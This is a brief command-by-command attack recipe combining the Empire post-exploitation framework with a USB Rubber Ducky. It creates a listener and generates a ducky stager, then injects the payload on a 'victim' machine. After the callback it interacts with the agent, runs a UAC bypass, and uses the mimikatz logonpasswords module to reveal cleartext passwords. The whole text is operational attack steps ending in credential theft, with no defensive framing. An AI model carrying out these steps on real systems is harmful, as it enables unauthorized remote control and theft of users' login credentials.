Empire + Ducky

1. Create listener 
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky 
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate inject.bin file from code in ducky.txt
at the Duck Toolkit site
3b. Copy inject.bin to Ducky
3c. Inject Ducky on victim
4. Try to extract login passwords from victim
4a. Wait for victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4c. (Empire: agents) > interact FSDFSGAJ34FGH4
4d. (Empire: FSDFSGAJ34FGH4 ) > sysinfo
4e. (Empire: FSDFSGAJ34FGH4 ) > usemodule privesc/bypassuac
4f. (Empire: privesc/bypassuac ) > set Listener Listener01
4g. (Empire: privesc/bypassuac ) > run 
4h. (Empire: privesc/bypassuac ) > back * 2
4i. (Empire: agents) > list
4j. (Empire: agents) > interact DSGHFDFSGHJ243J
4k. (Empire: DSGHFDFSGHJ243J ) > usemodule credentials/
4l. (Empire: credentials/mimikatz/logonpasswords ) > run

If succesful, logon passwords are now revealed in 
cleartext :)